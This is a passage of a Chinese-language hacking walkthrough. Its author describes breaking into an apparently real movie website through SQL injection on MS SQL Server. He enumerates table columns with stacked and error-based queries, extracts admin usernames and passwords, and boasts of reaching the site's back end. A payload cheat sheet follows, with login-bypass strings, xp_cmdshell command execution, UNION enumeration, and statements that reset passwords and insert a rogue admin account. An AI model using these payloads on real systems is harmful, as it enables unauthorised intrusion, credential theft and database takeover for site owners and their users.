第六步:猜重要表的字段 输入: 现在就看看users表有哪些字段 ffff’;update [users] set email=(select top 1 col_name(object_id(’users’),3) from users) where name=’ffff’;-- 得到第三个字段是password ffff’;update [users] set email=(select top 1 col_name(object_id(’users’),4) from users) where name=’ffff’;-- 得到第四个字段是name 最后users表的字段共28个全得到了 (注:另一个得到字段的办法,前提是系统的返回出错信息 a’ group by ID having 1=1-- 得到 Microsoft OLE DB Provider for SQL Server 错误 ’80040e14’ 列 ’users.userid’ 在选择列表中无效,因为该列既不包含在聚合函数中,也不包含在 GROUP BY 子句中。 /user/wantpws.asp,行63 这个第二个字段就是userid 显示第三个字段。 a’ group by id,userid having 1=1-- Microsoft OLE DB Provider for SQL Server 错误 ’80040e14’ 列 ’users.password’ 在选择列表中无效,因为该列既不包含在聚合函数中,也不包含在 GROUP BY 子句中。 /user/wantpws.asp,行63 得到是password 同理,一直显示出所有。:) ) users表 1 2 3 4 id userid password name 5 6 7 8 9 10 11 12 13 14 15 16 Province homeaddress city adress starlook sex email nlook nos date money send 17 18 19 20 21 22 23 24 25 26 27 28 oklook dnlook lasthits phone askmejoin getmoney payno logintime mflag state post note
starlook--12 10 2003 2:41PM nlook---0 nos---2 登陆次数 date--12 10 2003 12:00AM 注册时间? money--同上 send--空 oklook--0 dnlook--0 getmoney--0 state--0 note--这家伙很。。。 说明 password表 1 2 3 id name pwd 然后我又试ad原来是用来记录广告击点的。。 然后又试password表得到有name和pwd字段。 执行 ffff’;update [users] set email=(select top 1 name from password) where name=’ffff’;-- 可得第一个用户名是admin123看样儿多半是管理员了。 然后又得到了密码是dy***dick188还是打星号算了哈哈... 这样我们就完全进入了这个电影网站的后台了哈哈。 http://www.dy***.com/login.asp 再进一步还可以知道管理员一共有三人密码也都能看到了。 ffff’;update [users] set email=(select top 1 count(id) from password) where name=’ffff’;-- ffff’;update [users] set email=(select top 1 pwd from password where id=2) where name=’ffff’;-- ffff’;update [users] set email=(select top 1 name from password where id=2) where name=’ffff’;-- ------------------------------------------------------------ 数据库猜测测试: ’ or 1=1-- " or 1=1-- or 1=1-- ’ or ’a’=’a " or "a"="a ’) or (’a’=’a ----------------------------------------------------------------------------- ’; exec master..xp_cmdshell ’ping 10.10.1.2’-- //tftp,防火墙,nc,tcpdump.. ’; EXEC master..sp_makewebtask "\目标ip\share\output.html", "SELECT * FROM INFORMATION_SCHEMA.TABLES" UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES-- UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_ NAME NOT IN (’table1’)-- UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_ NAME LIKE ’%25login%25’-- UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_ NAME=’admin_login’-- UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_ NAME=’admin_login’ WHERE COLUMN_NAME NOT IN (’login_id’)-- UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_ NAME=’admin_login’ WHERE COLUMN_NAME NOT IN (’login_id’,’login_name’,’password’,details’)-- UNION SELECT TOP 1 login_name FROM admin_login-- UNION SELECT TOP 1 password FROM admin_login where login_name=’neo’-- UNION SELECT TOP 1 password FROM admin_login where login_name=’trinity’-- UNION SELECT TOP 1 convert(int, password%2b’%20morpheus’) FROM admin_login where login_name=’trinity’-- ;UPDATE ’admin_login’ SET ’password’ = ’newpas5’ WHERE login_name=’neo’-- ;INSERT INTO ’admin_login’ (’login_id’, ’login_name’, ’password’, ’details’) VALUES (666,’neo2’,’newpas5’,’NA’)-- -----------------------------------------------------------------------------
